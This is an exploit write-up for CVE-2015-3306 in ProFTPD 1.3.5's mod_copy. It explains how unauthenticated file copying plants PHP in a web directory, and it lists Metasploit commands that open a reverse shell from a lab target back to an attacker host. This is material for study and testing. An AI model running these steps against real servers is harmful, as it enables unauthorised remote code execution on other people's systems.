CVE-2015-3306 ProFTPD 1.3.5 Mod_Copy Command Execution

Timeline :

Vulnerability discovered and reported to the vendor by Vadim Melihow on 2015-04-07
Workaround provided by the vendor on 2015-04-07
Vulnerability details released on 2015-04-13
Metasploit PoC provided on 2015-04-22
Patch provided by the vendor on 2015-05-28

PoC provided by :

Vadim Melihow
xistence

Reference(s) :

CVE-2015-3306

Affected version(s) :

All versions of ProFTPD 1.3.5 before 1.3.5a
All versions of ProFTPD 1.3.6 before 1.3.6rc1

Tested on :

CentOS 6.7 with ProFTPD 1.3.5

Description :

This module exploits the SITE CPFR/CPTO commands implemented by mod_copy in ProFTPD version 1.3.5. mod_copy does not require a login before honouring them, so any unauthenticated client can copy files from any readable part of the filesystem to any writable destination. The copies are performed with the rights of the ProFTPD service, which by default runs as the ‘nobody’ user. The payload is smuggled in through /proc/self/cmdline: ProFTPD writes the command it is currently executing into its process title, so while a "SITE CPTO" whose destination name contains PHP code is being processed, /proc/self/cmdline of the serving process contains that PHP code. Copying /proc/self/cmdline to a temporary file and then copying that file into the website directory with a .php name, then requesting it over HTTP, gives PHP remote code execution.

This vulnerability is only exploitable in this way under particular conditions:
– ProFTPD must be able to write into a web-accessible directory, i.e. the directory must be writable by the user ProFTPD runs as (nobody by default), and the web server must execute PHP files placed there.
– SELinux must be disabled, since its default policy blocks proftpd from writing into the web root.

Commands :

ProFTPD is running as user and group “nobody”
ProFTPD is configured with “LoadModule mod_copy.c” in the proftpd.conf file
A “test” folder has been created in “/var/www/html/“ owned by nobody:nobody

use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST 192.168.6.154
set SITEPATH /var/www/html/test
set TARGETURI /test/
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.6.138
run

Once the reverse shell connects back, confirm the execution context. Because the payload is executed by PHP, the shell runs as the web server’s user rather than as ProFTPD’s “nobody”:

id

Done !